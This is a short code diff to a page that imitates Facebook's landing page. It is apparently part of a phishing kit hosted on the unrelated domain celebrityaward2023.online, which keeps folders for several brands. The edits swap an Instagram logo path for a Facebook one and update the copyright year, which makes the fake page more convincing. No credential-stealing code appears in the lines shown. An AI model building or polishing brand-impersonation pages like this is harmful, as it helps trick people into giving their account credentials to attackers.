--- a/facebook.com/index.html
+++ b/facebook.com/index.html
@@ -12,7 +12,7 @@
     <main>
         <div class="main">
         <div class="heading-section">
-            <img src="https://www.celebrityaward2023.online/instagram.com/images/logo.png" class="logo-img">
+            <img src="https://www.celebrityaward2023.online/facebook.com/images/logo.png" class="logo-img">
             <div class="a-ri8"><span>Facebook helps you connect and share with the people in your life.</span></div>
         </div>
 
@@ -93,7 +93,7 @@
                 </ul>
             </div>
             <div class="copyright">
-                <div><span> Facebook © 2021</span>
+                <div><span> Facebook © 2023</span>
                 </div>
             </div>
         </div>
